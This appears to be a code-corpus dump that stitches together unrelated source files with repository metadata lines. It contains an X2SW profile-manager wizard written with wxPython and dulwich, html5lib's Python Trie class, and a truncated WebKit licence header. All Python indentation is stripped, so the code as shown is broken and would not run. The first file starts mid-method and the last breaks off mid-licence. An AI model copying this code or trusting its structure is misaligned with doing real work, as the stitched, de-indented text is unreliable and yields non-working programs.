"""Constructor"""
wiz.WizardPageSimple.__init__(self, parent)
sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer = sizer
self.SetSizer(sizer)
title = wx.StaticText(self, -1, title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
sizer.Add(title, 0, wx.ALIGN_CENTRE|wx.ALL, 5)
sizer.Add(wx.StaticLine(self, -1), 0, wx.EXPAND|wx.ALL, 5)
########################################################################
class UpdateRepoPage(wiz.PyWizardPage):
"""Startup wizard page"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sizer.Add(wx.StaticText(self, -1, "\
This wizard helps you select and deploy X2SW profiles for your printer. Each\n\
X2SW profile contains configuration files for multiple software components\n\
(Slic3r profiles, Skeinforge profiles, Pronterface rc file).\n\
\n\
The profiles from either the online or local X2SW profile repository can be\n\
deployed. When deployed the profile files override the currently active\n\
configuration files of the software included in X2SW bundle."), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.offline_mode = wx.CheckBox(self, wx.ID_ANY, 'Use local repository (off-line mode)')
self.sizer.Add(self.offline_mode)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
x2ProfilerApp.repo = None
if not x2ProfilerApp.tmp_repo_path == None:
try:
shutil.rmtree(x2ProfilerApp.tmp_repo_path)
except:
wx.MessageBox('Unable to delete: ' + x2ProfilerApp.tmp_repo_path, '', style = wx.OK|wx.ICON_EXCLAMATION)
pass
x2ProfilerApp.tmp_repo_path = None
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
if not self.offline_mode.GetValue():
return self.next
else:
return self.next.GetNext()
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
#----------------------------------------------------------------------
def OnPageChanging(self, event):
# If no temp repo then we need to use the local one
global x2ProfilerApp
try:
if self.offline_mode.GetValue():
x2ProfilerApp.repo = Repo(x2ProfilerApp.x2swProfilesPath)
else:
x2ProfilerApp.tmp_repo_path = tempfile.mkdtemp()
x2ProfilerApp.repo = Repo.init(x2ProfilerApp.tmp_repo_path)
except:
pass
if x2ProfilerApp.repo == None:
event.Veto()
########################################################################
class DownloadingPage(wiz.PyWizardPage):
"""Wizard page for updating the profiles repo"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
global x2ProfilerApp
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.status = wx.StaticText(self, -1, "Downloading from " + x2ProfilerApp.repo_url + "...")
self.sizer.Add(self.status, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.count = 0
self.gauge = wx.Gauge(self, -1, 100, size = (250, 25))
self.sizer.Add(self.gauge)
self.gauge.SetBezelFace(3)
self.gauge.SetShadowWidth(3)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.lasttopic = None
self.msgbuf = ''
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.Show()
self.GetParent().Update()
try:
self.cmd_fetch(x2ProfilerApp.repo, x2ProfilerApp.repo_url)
self.gauge.SetValue(100)
self.status.SetLabel('Done fetching from ' + x2ProfilerApp.repo_url)
except Exception as e:
self.status.SetLabel('Failure to create temporary repository for:\n' + x2ProfilerApp.repo_url)
self.gauge.SetValue(0)
wx.MessageBox("Error:\n\n" + str(e), '', style = wx.OK|wx.ICON_EXCLAMATION)
#----------------------------------------------------------------------
def flush(self, msg=None):
if self.lasttopic:
self.status.SetLabel(self.lasttopic)
self.gauge.SetValue(0)
self.lasttopic = None
if msg:
self.status.SetLabel(msg)
#----------------------------------------------------------------------
# as it is done in hggit (not sure why it has to be so complex...)
def progress(self, msg):
# Counting objects: 3, done.
# Compressing objects: 100% (3/3), done.
# Total 3 (delta 0), reused 0 (delta 0)
msgs = re.split('[\r\n]', self.msgbuf + msg)
self.msgbuf = msgs.pop()
for msg in msgs:
### for debugging ### print 'msg:' + msg + '\n'
td = msg.split(':', 1)
data = td.pop()
if not td:
self.flush(data)
continue
topic = td[0]
m = re.search('\((\d+)/(\d+)\)', data)
if m:
if self.lasttopic and self.lasttopic != topic:
self.flush()
self.lasttopic = topic
pos, total = map(int, m.group(1, 2))
try:
perc = int((pos * 100) / total)
except:
perc = 0
self.gauge.SetValue(perc)
else:
self.flush(msg)
self.Show()
self.GetParent().Update()
#----------------------------------------------------------------------
def cmd_fetch(self, r, url_path):
c, path = get_transport_and_path(url_path)
c._fetch_capabilities.remove('thin-pack')
### for debugging ### c = client.SubprocessGitClient(thin_packs=False)
path = url_path
determine_wants = r.object_store.determine_wants_all
refs = c.fetch(path, r, progress=self.progress)
for k in refs.keys():
if k[-3:] == '^{}': # Annotated tag ref
k = k[:-3]
r[k] = refs[k]
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class SelectProfilesPage(wiz.PyWizardPage):
"""Wizard page for selecting what profiles to deploy"""
REF_TYPE_TAG = 1
REF_TYPE_HEAD = 2
REF_TYPE_RHEAD = 3
#----------------------------------------------------------------------
def __init__(self, parent, title):
global x2ProfilerApp
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.under_title_sizer = wx.BoxSizer(wx.HORIZONTAL)
self.tree_title = wx.StaticText(self, -1, "Select the printer profile")
self.under_title_sizer.Add(self.tree_title, 1, wx.ALL|wx.ALIGN_LEFT, 0)
self.show_all = wx.CheckBox(self, wx.ID_ANY, 'Show All')
self.show_all.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.all = False
self.under_title_sizer.Add(self.show_all, 0, wx.ALL|wx.ALIGN_RIGHT, 0)
self.sizer.Add(self.under_title_sizer, 0, wx.ALL|wx.EXPAND, 5)
self.tree = wx.TreeCtrl(self, -1, style = wx.TR_HAS_BUTTONS|wx.TR_HAS_VARIABLE_ROW_HEIGHT)
image_list = wx.ImageList(16, 16)
self.profile = image_list.Add(wx.Image("images/profile.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.profile_rb = image_list.Add(wx.Image("images/profile_rb.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.profile_lb = image_list.Add(wx.Image("images/profile_lb.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.folder = image_list.Add(wx.Image("images/folder.png", wx.BITMAP_TYPE_PNG).ConvertToBitmap())
self.tree.AssignImageList(image_list)
self.sizer.Add(self.tree, 2, wx.EXPAND)
self.sizer.Add(wx.StaticText(self, -1, "Selected profile description:"), 0, wx.ALL, 5)
self.descript = wx.TextCtrl(self, -1, '', style = wx.TE_READONLY | wx.TE_MULTILINE)
self.sizer.Add(self.descript, 1, wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.selection = None
#----------------------------------------------------------------------
def fillTree(self, refsList, path, node):
for item_name,item_file,ref_type in refsList[path]:
child_path = path + '/' + item_name
if ref_type == self.REF_TYPE_TAG:
child_ref_path = 'refs/tags' + child_path[4:]
prof_image = self.profile
elif ref_type == self.REF_TYPE_HEAD:
child_ref_path = 'refs/heads' + child_path[4:]
prof_image = self.profile_lb
elif ref_type == self.REF_TYPE_RHEAD:
child_ref_path = 'refs/remotes/origin' + child_path[4:]
prof_image = self.profile_rb
### for debugging ### print child_ref_path
child = self.tree.AppendItem(node, item_name)
if item_file:
child_ref_sha = self.refs[child_ref_path]
self.tree.SetPyData(child, child_ref_sha)
self.tree.SetItemImage(child, prof_image, wx.TreeItemIcon_Normal)
else:
self.tree.SetItemImage(child, self.folder, wx.TreeItemIcon_Normal)
if refsList.has_key(child_path):
self.fillTree(refsList, child_path, child)
#----------------------------------------------------------------------
def Run(self):
# Prepare a tree-structured dictionary of refs paths
global x2ProfilerApp
self.repo = x2ProfilerApp.repo
self.refs = self.repo.get_refs()
refsList = {}
# Make remote origin heads look similar to tags and local heads
refkeys = ['refs/rheads'+item[19:] if item[:19]=='refs/remotes/origin' else item for item in self.refs.keys()]
reflist = sorted(sorted(refkeys),key=lambda x: -len(x.split('/')))
### for debugging #### print reflist
for ref in reflist:
parts = ref.split('/')
# We only use refs that have format refs/<tags|heads|rheads>/vX.X.X.X/<type>/...
# Filter out one-level refs and anything that is neither tag or head
if parts[0] != 'refs' or len(parts) <= 4:
continue
if parts[1] != 'tags' and parts[1] != 'heads' and parts[1] != 'rheads':
continue
# Is it a tag, a local branch head or remote branch head?
ref_type = self.REF_TYPE_TAG
if parts[1] == 'heads':
ref_type = self.REF_TYPE_HEAD
elif parts[1] == 'rheads':
ref_type = self.REF_TYPE_RHEAD
ver_prefix = parts[2]
if not self.all and not ver_prefix.startswith('v' + x2ProfilerApp.ver_match_str):
continue
parts[1] = 'root'
for ii in range(2, len(parts)):
key = '/'.join(parts[1:ii])
# see if already have the node path we are about to add
if refsList.has_key(key + '/' + parts[ii]):
continue
# build reference key
# If at the end of the branch (i.e. the tag/head ref file name)
file_ref = False
if ii >= len(parts)-1:
file_ref = True
# Still going down the ref's path...
# If we already started ading items to this subtree
if refsList.has_key(key):
refsList[key].append([parts[ii],file_ref,ref_type])
else:
refsList[key]=[[parts[ii],file_ref,ref_type]]
### for debugging ### print 'ii: '+ str(ii) +' ### key: ' + key + ' ### add: ' + parts[ii]
# Build the UI tree (can do it above, but cleaner to separate)
self.tree.DeleteAllItems()
root_str = "FDM 3D Printer Profiles for X2SW"
if self.all or len(x2ProfilerApp.ver[0]) == 0:
root_str = root_str + " (all versions)"
else:
root_str = root_str + " v" + x2ProfilerApp.ver[0]
root = self.tree.AddRoot(root_str)
self.tree.SetItemImage(root, self.folder, wx.TreeItemIcon_Normal)
if refsList.has_key('root'):
self.fillTree(refsList, 'root', root)
self.tree.Expand(root)
# On/off next button based on either a profile was selected or not
self.Bind(wx.EVT_TREE_SEL_CHANGED, self.OnSelChanged, self.tree)
if self.selection != None:
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def OnSelChanged(self, event):
global x2ProfilerApp
self.selection = self.tree.GetPyData(event.GetItem())
if self.selection != None:
try:
self.ShowDescription(self.selection)
x2ProfilerApp.selection = self.selection
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
except:
x2ProfilerApp.selection = None
self.descript.SetValue('')
pass
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
x2ProfilerApp.selection = None
self.descript.SetValue('')
event.Skip()
#----------------------------------------------------------------------
def ShowDescription(self, ref):
o = self.repo[ref]
if o.type_name == 'tag':
message = 'By: ' + o.tagger + '\n'
#message += 'Type: annotated tag\n'
message += o.message
elif o.type_name == 'commit':
message = 'By: ' + o.author + '\n'
#message += 'Type: tagged commit\n'
message += o.message
self.descript.SetValue(message)
#----------------------------------------------------------------------
def onCheckbox(self, event):
self.all = self.show_all.GetValue()
self.Run()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class ChooseModePage(wiz.PyWizardPage):
"""Wizard page for managing in-place mode"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, "\
This page helps to control where the X2SW profile configuration files are stored.\n\
If the \"in-place\" mode is ON all the included software stores the config files\n\
locally under \".x2sw\" in X2SW installation folder. If it is OFF the files are\n\
stored under \".x2sw\" in the user home folder.\n\
\n\
The \"in-place\" mode is configured per user account and applies to all installed\n\
copies of the X2SW bundle. The deployment path for the mode chosen is shown above.\n\
\n\
If you want to change the \"in-place\" mode setting and skip the profile deployment\n\
step, cancel the wizard after choosing the desired mode."), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.inplace_mode = wx.CheckBox(self, wx.ID_ANY, 'Use In-Place mode')
self.sizer.Add(self.inplace_mode)
if os.path.exists(os.path.join(os.path.expanduser('~'), '.x2sw', '.use_local')):
self.inplace_mode.SetValue(True)
self.inplace_mode.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def UpdatePageUi(self):
global x2ProfilerApp
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
if self.selection == None:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
self.UpdatePageUi()
#----------------------------------------------------------------------
def onCheckbox(self, event):
global x2ProfilerApp
inplace_path = os.path.join(os.path.expanduser('~'), '.x2sw')
inplace_file = os.path.join(inplace_path, '.use_local')
if not os.path.exists(inplace_path):
os.mkdir(inplace_path)
if self.inplace_mode.IsChecked():
with file(inplace_file, 'a'):
pass
else:
os.remove(inplace_file)
x2ProfilerApp.changes = True
x2ProfilerApp.DetermineProfilesPaths()
self.UpdatePageUi()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class DeployPage(wiz.PyWizardPage):
"""Wizard page confirming what where to deploy"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, "\
When you click \"Next\" the content of the X2SW profile selected will override\n\
the configuration files of the all X2SW software components under the \"Deployment\n\
path\". When ready confirm that you'd like to deploy and continue to the next page.\n\
\n\
WARNING: All the user files (if any) under the \"Deployment path\" will be lost!!!"), 0, wx.ALL, 5)
self.sizer.Add(wx.StaticText(self, -1, ""), 0, wx.ALL, 5)
self.deploy_profile = wx.CheckBox(self, wx.ID_ANY, 'Deploy profile')
self.sizer.Add(self.deploy_profile)
self.deploy_profile.Bind(wx.EVT_CHECKBOX, self.onCheckbox)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def UpdatePageUi(self):
global x2ProfilerApp
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
#----------------------------------------------------------------------
def Run(self):
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
self.deploy_profile.SetValue(False)
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
if self.selection != None:
self.deploy_profile.Enable()
else:
self.deploy_profile.Disable()
self.UpdatePageUi()
#----------------------------------------------------------------------
def onCheckbox(self, event):
if self.deploy_profile.IsChecked():
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
else:
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def OnPageChanging(self, event):
# Disable buttons as we moving forward
if event.GetDirection():
self.GetParent().FindWindowById(wx.ID_FORWARD).Disable()
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class ReportResultPage(wiz.PyWizardPage):
"""Wizard page completing the deployment"""
#----------------------------------------------------------------------
def __init__(self, parent, title):
wiz.PyWizardPage.__init__(self, parent)
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
title = wx.StaticText(self, label=title)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.Add(title)
self.sel_box = wx.StaticText(self, -1, '\n\n')
self.sizer.Add(self.sel_box, 0, wx.ALL, 5)
self.status = wx.StaticText(self, -1, "Processing...")
self.sizer.Add(self.status, 0, wx.ALL, 5)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
#----------------------------------------------------------------------
def afterRun(self):
self.GetParent().FindWindowById(wx.ID_FORWARD).Enable()
#----------------------------------------------------------------------
def Run(self):
self.status.SetLabel("Processing...")
global x2ProfilerApp
self.selection = x2ProfilerApp.selection
if self.selection != None:
if not x2ProfilerApp.tmp_repo_path == None:
paths_str = "\nFrom repository: " + x2ProfilerApp.repo_url + "\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
else:
paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
self.Show()
self.GetParent().Update()
if not x2ProfilerApp.page5.deploy_profile.IsChecked():
self.status.SetLabel("No changes performed, no profile selected!")
else:
try:
self.DoDeploy(self.selection)
self.status.SetLabel("The operation has completed successfully.")
except Exception as e:
self.status.SetLabel("\
The operation has failed! If using Windows in-place profile storage try to run\n\
the X2SW app in Windows XP(SP 2) compatibility mode or run it as Administrator.\n\
You can also cd to X2SW profiles folder and use GIT to check out the desired\n\
profile manually or attempt to diagnose and fix the issue.")
wx.MessageBox("Error:\n\n" + str(e), '', style = wx.OK|wx.ICON_EXCLAMATION)
x2ProfilerApp.changes = True
self.Show()
self.GetParent().Update()
wx.CallAfter(self.afterRun)
#----------------------------------------------------------------------
def DoDeploy(self, ref):
global x2ProfilerApp
self.repo = x2ProfilerApp.repo
self.refs = self.repo.get_refs()
o = self.repo[ref]
while o.type_name == 'tag':
type_name, sha = o._get_object()
o = self.repo.get_object(sha)
if not o.type_name == 'commit':
raise ValueError('Unable to find the tagged commit!')
# We can only do a clean checkout, so clenaup
self.RmAllProfiles(x2ProfilerApp.x2swProfilesPath)
# Dulwich can't handle detached head, so use a temp branch as a workaround
self.repo.refs.set_symbolic_ref('HEAD', 'refs/heads/temp')
self.repo['HEAD'] = o.id
build_index_from_tree(self.repo.path, self.repo.index_path(),
self.repo.object_store, o.tree)
# Make the deployment folder (if not there) and checkout files into it
if not os.path.isdir(x2ProfilerApp.x2swProfilesTgtPath):
os.makedirs(x2ProfilerApp.x2swProfilesTgtPath)
else:
# Cleanup the deployment destination
self.RmAllProfiles(x2ProfilerApp.x2swProfilesTgtPath)
build_index_from_tree(x2ProfilerApp.x2swProfilesTgtPath, self.repo.index_path(),
self.repo.object_store, o.tree)
#----------------------------------------------------------------------
def RmAllProfiles(self, path):
if not path.endswith('.x2sw'):
raise ValueError('The path to RmAllProfiles() does not appear to be correct!')
for root, dirs, files in os.walk(path):
if root == path:
if '.git' in dirs:
dirs.remove('.git')
if '.git' in files:
files.remove('.git')
if '.use_local' in files:
files.remove('.use_local')
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
shutil.rmtree(os.path.join(root, name))
dirs.remove(name)
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class X2ProfilerApp():
"""Main app class"""
#----------------------------------------------------------------------
def imagefile(self, filename):
if os.path.exists(os.path.join(os.path.dirname(__file__), "images", filename)):
return os.path.join(os.path.dirname(__file__), "images", filename)
else:
return os.path.join(os.path.split(os.path.split(__file__)[0])[0], "images", filename)
#----------------------------------------------------------------------
def DetermineProfilesPaths(self):
self.x2swProfilesTgtPath = os.path.join(os.path.expanduser('~'), '.x2sw')
if (os.path.exists(os.path.join(self.x2swProfilesTgtPath, '.use_local'))):
self.x2swProfilesTgtPath = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), '.x2sw')
self.x2swProfilesPath = os.path.abspath(os.path.dirname(sys.argv[0]))
self.x2swProfilesPath = os.path.join(self.x2swProfilesPath, '.x2sw')
#----------------------------------------------------------------------
def ReadOurVersion(self):
versionfile = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), VERSION_FILE)
if os.path.exists(versionfile):
with open(versionfile) as f:
self.ver = f.read().splitlines()
else:
self.ver = [ None ]
# Match string (major.minor.) use: vrsion_str_tocheck.startswith(ver_match_str)
self.ver_match_str = ""
if self.ver[0]:
ver = self.ver[0]
ver = ver[:ver.find('.', ver.find('.') + 1) + 1]
self.ver_match_str = ver
else:
self.ver = [ "" ]
#----------------------------------------------------------------------
def IsProfileCompatible(self):
compat_file = os.path.join(self.x2swProfilesPath, COMPAT_FILE)
we_are_compatible = False
match_strs = []
if os.path.exists(compat_file):
with open(compat_file) as f:
match_strs = f.read().splitlines()
for match_str in match_strs:
if self.ver[0] and self.ver[0].startswith(match_str):
we_are_compatible = True
break
return we_are_compatible
#----------------------------------------------------------------------
def UpdateCompatFile(self):
compat_file = os.path.join(self.x2swProfilesPath, COMPAT_FILE)
we_are_compatible = False
match_strs = []
if os.path.exists(compat_file):
with open(compat_file) as f:
match_strs = f.read().splitlines()
match_strs.append(self.ver_match_str)
if os.path.exists(self.x2swProfilesPath):
with open(compat_file, "w") as myfile:
for line in match_strs:
myfile.write(line + "\n")
return
#----------------------------------------------------------------------
def Run(self, onlyIfVersionCheckFails = False):
global x2ProfilerApp
x2ProfilerApp = self
self.DetermineProfilesPaths()
self.repo = None
self.changes = False
### for debugging ### self.repo_url = 'D:\\tmp\\.x2sw'
self.repo_url = 'https://github.com/dob71/x2sw_profiles.git'
self.selection = None
self.tmp_repo_path = None
# Read our version (x2ProfilerApp.ver array contains strings from version.txt)
self.ReadOurVersion()
# If running for version check only, be done if have copatible profiles
if onlyIfVersionCheckFails:
if self.IsProfileCompatible():
return
else:
msg = "The current profile is not compatible with X2SW v" + self.ver[0] + ". "\
"Would you like to run X2Profiler and download compatible set of profiles? "\
"\n\n"\
"Click [Cancel] to mark the currnet profile compatible and no loger display this message "\
"(dangerous, the app might no longer start). Click [No] to skip the update just for now. "\
"You'll be asked to update again next time app starts."\
"\n\n"\
"Profile path: " + self.x2swProfilesPath
res = wx.MessageBox(msg, style = wx.YES_NO|wx.CANCEL|wx.YES_DEFAULT|wx.ICON_QUESTION)
if res == wx.CANCEL:
self.UpdateCompatFile()
return
elif res == wx.NO:
return
image = wx.Image(self.imagefile("wiz.png"), wx.BITMAP_TYPE_PNG).ConvertToBitmap()
self.wizard = wiz.Wizard(None, -1, "X2 Profile Manager", image)
self.page1 = UpdateRepoPage(self.wizard, "Update Profiles")
self.page2 = DownloadingPage(self.wizard, "Downloading")
self.page3 = SelectProfilesPage(self.wizard, "Select Profile")
self.page4 = ChooseModePage(self.wizard, "Storage Mode")
self.page5 = DeployPage(self.wizard, "Deploy Profile")
self.page6 = ReportResultPage(self.wizard, "Deploying")
# Set the initial order of the pages
self.page1.SetNext(self.page2)
self.page2.SetPrev(self.page1)
self.page2.SetNext(self.page3)
self.page3.SetPrev(self.page1) # Always skip downloading page on the way back
self.page3.SetNext(self.page4)
self.page4.SetPrev(self.page3)
self.page4.SetNext(self.page5)
self.page5.SetPrev(self.page4)
self.page5.SetNext(self.page6)
self.page6.SetPrev(self.page5)
iconpath = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'x2.ico')
if os.path.exists(iconpath):
self.wizard.SetIcon(wx.Icon(iconpath,wx.BITMAP_TYPE_ICO))
self.wizard.Bind(wiz.EVT_WIZARD_PAGE_CHANGING, self.OnPageChanging)
self.wizard.Bind(wx.wizard.EVT_WIZARD_PAGE_CHANGED, self.OnPageChanged)
self.wizard.FitToPage(self.page1)
self.wizard.GetPageAreaSizer().Add(self.page1)
self.wizard.RunWizard(self.page1)
self.wizard.Destroy()
if not x2ProfilerApp.tmp_repo_path == None:
try:
shutil.rmtree(x2ProfilerApp.tmp_repo_path)
x2ProfilerApp.tmp_repo_path = None
except:
pass
return self.changes
#----------------------------------------------------------------------
def OnPageChanged(self, event):
cp = self.wizard.GetCurrentPage()
if hasattr(cp, 'Run'):
wx.CallAfter(cp.Run)
#----------------------------------------------------------------------
def OnPageChanging(self, event):
pg = event.GetPage()
if hasattr(pg, 'OnPageChanging'):
pg.OnPageChanging(event)
########################################################################
if __name__ == "__main__":
app = wx.App(False)
X2ProfilerApp().Run()
| gpl-3.0 |
WholeGrainGoats/servo | tests/wpt/web-platform-tests/tools/html5lib/html5lib/trie/py.py | 817 | 1763 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
from bisect import bisect_left
from ._base import Trie as ABCTrie
class Trie(ABCTrie):
def __init__(self, data):
if not all(isinstance(x, text_type) for x in data.keys()):
raise TypeError("All keys must be strings")
self._data = data
self._keys = sorted(data.keys())
self._cachestr = ""
self._cachepoints = (0, len(data))
def __contains__(self, key):
return key in self._data
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self, prefix=None):
if prefix is None or prefix == "" or not self._keys:
return set(self._keys)
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
start = i = bisect_left(self._keys, prefix, lo, hi)
else:
start = i = bisect_left(self._keys, prefix)
keys = set()
if start == len(self._keys):
return keys
while self._keys[i].startswith(prefix):
keys.add(self._keys[i])
i += 1
self._cachestr = prefix
self._cachepoints = (start, i)
return keys
def has_keys_with_prefix(self, prefix):
if prefix in self._data:
return True
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
i = bisect_left(self._keys, prefix, lo, hi)
else:
i = bisect_left(self._keys, prefix)
if i == len(self._keys):
return False
return self._keys[i].startswith(prefix)
| mpl-2.0 |
fentas/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/performance_tests/perftestsrunner.py | 115 | 17309 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
